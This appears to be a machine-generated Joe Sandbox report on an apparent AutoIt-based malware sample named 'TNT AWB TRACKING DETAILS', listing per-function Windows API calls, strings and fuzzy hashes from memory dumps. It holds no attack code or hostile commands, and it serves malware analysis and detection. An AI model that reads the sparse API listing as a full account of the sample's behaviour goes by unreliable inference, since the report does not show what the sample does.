                                                    • Instruction ID: 56ae422ef8e26b2a60e02aaf02c4306d064d74f1445e229ae877e59eeaeed942
                                                    • Opcode Fuzzy Hash: 8b870828cba9041b7d843090aa57a9c765cdad45e2c129f9f25fd6f7f6c6ec7d
                                                    • Instruction Fuzzy Hash: 7B41D672A04259BADF219AA1DC45FEFBBFDEF85710F000069F904B7180DAB19A05DB61
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F3259E
                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F325D4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CrackInternet_memset
                                                    • String ID: |
                                                    • API String ID: 1413715105-2343686810
                                                    • Opcode ID: 1be018c2951e0f9d6745eb6862a6ab3b63c7165cbfdf206d3bd83c8bc06b75e6
                                                    • Instruction ID: 312814bf78fc7db135d4c5afb9db1230135e299718649c026019428f251cf438
                                                    • Opcode Fuzzy Hash: 1be018c2951e0f9d6745eb6862a6ab3b63c7165cbfdf206d3bd83c8bc06b75e6
                                                    • Instruction Fuzzy Hash: 6A31F571800119ABCF41AFA1CD86EEEBFB8FF08310F10105AED55B6162EA325956DF60
                                                    APIs
                                                    • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00F47B61
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F47B76
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: '
                                                    • API String ID: 3850602802-1997036262
                                                    • Opcode ID: 5228395b8401af5c81213a9aaeb72e377bb05482c2815fb98051b7db2eee70c9
                                                    • Instruction ID: 029f83b5b81f10e8b979414061645c3e204a17ea74dbb91e17e4ceb5dc7ffe89
                                                    • Opcode Fuzzy Hash: 5228395b8401af5c81213a9aaeb72e377bb05482c2815fb98051b7db2eee70c9
                                                    • Instruction Fuzzy Hash: ED411674A0530A9FDB14DF64C980BEABBB9FB08300F10016AED08EB395D730A941DF90
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00F46B17
                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F46B53
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$DestroyMove
                                                    • String ID: static
                                                    • API String ID: 2139405536-2160076837
                                                    • Opcode ID: 06e05cb501558bff65b032dba8f51b07f4e606d29b02162fa34f5bc4be318b7d
                                                    • Instruction ID: 8ac97b136ca0ac7c0bbd6cc44f0ce73ddaee959df7ca15f45b7dbadb78c60247
                                                    • Opcode Fuzzy Hash: 06e05cb501558bff65b032dba8f51b07f4e606d29b02162fa34f5bc4be318b7d
                                                    • Instruction Fuzzy Hash: 6531B071200604AEDB109F24CC40FFB7BA8FF89764F108519FDA9D3191DA35AC81E761
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F22911
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F2294C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: 59df7ce0288695e9ef037c543f261462e7e61a5114c439221e95e8db0458ae05
                                                    • Instruction ID: d412990b1105b682c3d8f752c0ae15fe85d771b3a1dd184e116624915b5d8a07
                                                    • Opcode Fuzzy Hash: 59df7ce0288695e9ef037c543f261462e7e61a5114c439221e95e8db0458ae05
                                                    • Instruction Fuzzy Hash: 6E319531900319BBDB64CF58ED45BEEBBF8EF45360F140019ED85AA1A1D7709984FB51
                                                    APIs
                                                    • __snwprintf.LIBCMT ref: 00F33A66
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __snwprintf_memmove
                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                    • API String ID: 3506404897-2584243854
                                                    • Opcode ID: 57514adefa8c5c8d6ee993fb37999123b2013cba6dd1af754e4b3788892010da
                                                    • Instruction ID: ae0df204e6a93a70f5f660f79a7cab66e8d3722662729da2ffee84d0571ea7bd
                                                    • Opcode Fuzzy Hash: 57514adefa8c5c8d6ee993fb37999123b2013cba6dd1af754e4b3788892010da
                                                    • Instruction Fuzzy Hash: 2921B135600219AACF10EF64CD82EAE77F4AF48760F404459F449B7182DB35EA42DB62
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F46761
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F4676C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    • Opcode ID: d72c70f151f5f62fe9ff27ea4df360849a7a979631123b292c89a6a492a2267c
                                                    • Instruction ID: 1486ffa4b5b0c18941b4c525caaedd97e76f89c789d4214ff0b5c2cd2e93a78a
                                                    • Opcode Fuzzy Hash: d72c70f151f5f62fe9ff27ea4df360849a7a979631123b292c89a6a492a2267c
                                                    • Instruction Fuzzy Hash: A711B275600208AFEF118F54CC80EFB3F6AEB4A3A8F114129FD18D7291DA75DC51A7A1
                                                    APIs
                                                      • Part of subcall function 00EC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EC1D73
                                                      • Part of subcall function 00EC1D35: GetStockObject.GDI32(00000011), ref: 00EC1D87
                                                      • Part of subcall function 00EC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EC1D91
                                                    • GetWindowRect.USER32(00000000,?), ref: 00F46C71
                                                    • GetSysColor.USER32(00000012), ref: 00F46C8B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                    • String ID: static
                                                    • API String ID: 1983116058-2160076837
                                                    • Opcode ID: 6413996a895df98646d469dabf1575c30b71359a54ed518a78ba3c6c051576fa
                                                    • Instruction ID: 982f439875a02a162a54990d293a2d8b3e86d404bbc3f4cc6c3e1478c07cfcc9
                                                    • Opcode Fuzzy Hash: 6413996a895df98646d469dabf1575c30b71359a54ed518a78ba3c6c051576fa
                                                    • Instruction Fuzzy Hash: C0215972910209AFDF04DFA8CC85EFA7BB8FB09315F004628FE95D2250D635E850EB61
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00F469A2
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F469B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: edit
                                                    • API String ID: 2978978980-2167791130
                                                    • Opcode ID: 3d4d8126c51a88263a8e8ba0f0562b490845c114c017d3667b01f67379d834ed
                                                    • Instruction ID: c1db42d61404b649b85bea4303e17bdf901a4625d25a3a4855a35d7b42fd0e3d
                                                    • Opcode Fuzzy Hash: 3d4d8126c51a88263a8e8ba0f0562b490845c114c017d3667b01f67379d834ed
                                                    • Instruction Fuzzy Hash: 73116A72910208ABEB108E649C40AEB3BA9EB163B4F504728FDA5D61E0C6B5DC95B761
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F22A22
                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F22A41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: 7dc961dfd1d259402f3da950f265f6b1531a465481471eb8c5ed05518c82a36b
                                                    • Instruction ID: 177f575127601c14a2402149b2c127aef8fe758196691eed889c42ca77de78d4
                                                    • Opcode Fuzzy Hash: 7dc961dfd1d259402f3da950f265f6b1531a465481471eb8c5ed05518c82a36b
                                                    • Instruction Fuzzy Hash: 4F11E932D01138BBCB74DB98EC44BEA73B8AB46720F044021E955EB250D774AD05EB91
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F3222C
                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F32255
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Internet$OpenOption
                                                    • String ID: <local>
                                                    • API String ID: 942729171-4266983199
                                                    • Opcode ID: 7fc5bb8eae7fdce42b24d4c778c0f6a21a7839fefba9e0dbf85cfed258538f73
                                                    • Instruction ID: f408681472362248874d6a6e4ce2ab8c5508d3a2290f0c37f868ba44faec9614
                                                    • Opcode Fuzzy Hash: 7fc5bb8eae7fdce42b24d4c778c0f6a21a7839fefba9e0dbf85cfed258538f73
                                                    • Instruction Fuzzy Hash: AE11C271941225BAEB658F518C88FBBFFA8FF16771F10822AF91986000D3709995E6F1
                                                    APIs
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                      • Part of subcall function 00F1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F1AABC
                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F18E73
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    • Opcode ID: a0359968c7f401d9a018bfb42a9f15549e84f3f321401b51823639c87ff93efd
                                                    • Instruction ID: 749e43778f2de1a3ca79719e48944a8f8d9513ba74bf63f464439df7152637a8
                                                    • Opcode Fuzzy Hash: a0359968c7f401d9a018bfb42a9f15549e84f3f321401b51823639c87ff93efd
                                                    • Instruction Fuzzy Hash: 6B016872A01219ABCB04FBE0CD51DFE33A8EF463A0F100619F836A72D1DE365849E751
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: 3c$_
                                                    • API String ID: 4104443479-4099079164
                                                    • Opcode ID: fb5f5530c1f182dccda8f4a7becdfd004d30e81ed8310b18fc69547ab2fde054
                                                    • Instruction ID: 8c936ce881db1886e6b5aaad4780aee04d16898c282ce39ad8e16363c267ebd7
                                                    • Opcode Fuzzy Hash: fb5f5530c1f182dccda8f4a7becdfd004d30e81ed8310b18fc69547ab2fde054
                                                    • Instruction Fuzzy Hash: 5301C432600B058FD730CE6CDD90A1A7BF9BB453557100D3EE542DAA10EBB0F804AB00
                                                    APIs
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                      • Part of subcall function 00F1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F1AABC
                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F18D6B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    • Opcode ID: db3d9efde7d00939fd00e0aac930beaf6e39a13972143c02f80400508232caad
                                                    • Instruction ID: c39e2c10fbcd9f359873eb8ae9972b2728269eede48b7acab0924ef716a61ef9
                                                    • Opcode Fuzzy Hash: db3d9efde7d00939fd00e0aac930beaf6e39a13972143c02f80400508232caad
                                                    • Instruction Fuzzy Hash: 5701F772A41209ABCB14EBE0CE52FFE77A8DF15390F100019B816B32D1DE255E49E672
                                                    APIs
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                      • Part of subcall function 00F1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F1AABC
                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F18DEE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    • Opcode ID: 034ba9fe09997564eb429f78917e039d048e9d2f06c3b0d777edf9391974a51d
                                                    • Instruction ID: ea7f6415466de5e9f5b430e5e7c5e63350e2406b78344e41dd0748cd73b7bb14
                                                    • Opcode Fuzzy Hash: 034ba9fe09997564eb429f78917e039d048e9d2f06c3b0d777edf9391974a51d
                                                    • Instruction Fuzzy Hash: 8901F772A41209A7CB14E6A4CA52FFE77A88F16390F104019B816B3291DE255E4AF672
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp
                                                    • String ID: #32770
                                                    • API String ID: 2292705959-463685578
                                                    • Opcode ID: 9e543951038ade6e284e3d36e4b38c95dce50f299f20989efc19b7ffaadb96e7
                                                    • Instruction ID: 0a522983e4b18dfede1d006bca6f1a7c2a2c4a968bcdceacd595fa42b781cc14
                                                    • Opcode Fuzzy Hash: 9e543951038ade6e284e3d36e4b38c95dce50f299f20989efc19b7ffaadb96e7
                                                    • Instruction Fuzzy Hash: ACE0D832A0023C6BD7209BA9EC49FA7F7ECEB95B70F000067FD04D7151D960AA458BE1
                                                    APIs
                                                      • Part of subcall function 00EFB314: _memset.LIBCMT ref: 00EFB321
                                                      • Part of subcall function 00EE0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00EFB2F0,?,?,?,00EC100A), ref: 00EE0945
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00EC100A), ref: 00EFB2F4
                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00EC100A), ref: 00EFB303
                                                    Strings
                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00EFB2FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                    • API String ID: 3158253471-631824599
                                                    • Opcode ID: e2ba3cc8d2c326b810c4a78140bfdc8191f182fc41750c6c673a18465f36ab3f
                                                    • Instruction ID: a6022f42369ab7b27022122f4012d85ab3efa02c51099824ea516d97607c23be
                                                    • Opcode Fuzzy Hash: e2ba3cc8d2c326b810c4a78140bfdc8191f182fc41750c6c673a18465f36ab3f
                                                    • Instruction Fuzzy Hash: C1E09274601748CFD760DF28D5047527BE4AF50758F01893DE89AD7241EBF5D448DBA1
                                                    APIs
                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F17C82
                                                      • Part of subcall function 00EE3358: _doexit.LIBCMT ref: 00EE3362
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Message_doexit
                                                    • String ID: AutoIt$Error allocating memory.
                                                    • API String ID: 1993061046-4017498283
                                                    • Opcode ID: ba6f0400f1a82f78be6ca0f1c31547710b6ba86da5dc5fbc871daed16472584c
                                                    • Instruction ID: 1817883b2bd0284335baec359fa0c453ca0b385a2d336e2ab50472f96ff2322b
                                                    • Opcode Fuzzy Hash: ba6f0400f1a82f78be6ca0f1c31547710b6ba86da5dc5fbc871daed16472584c
                                                    • Instruction Fuzzy Hash: C6D05B323C435C36D11532B57D0BFDA76C84F15B52F045426FF0C695E389D295C161E6
                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 00F01775
                                                      • Part of subcall function 00F3BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00F0195E,?), ref: 00F3BFFE
                                                      • Part of subcall function 00F3BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F3C010
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F0196D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
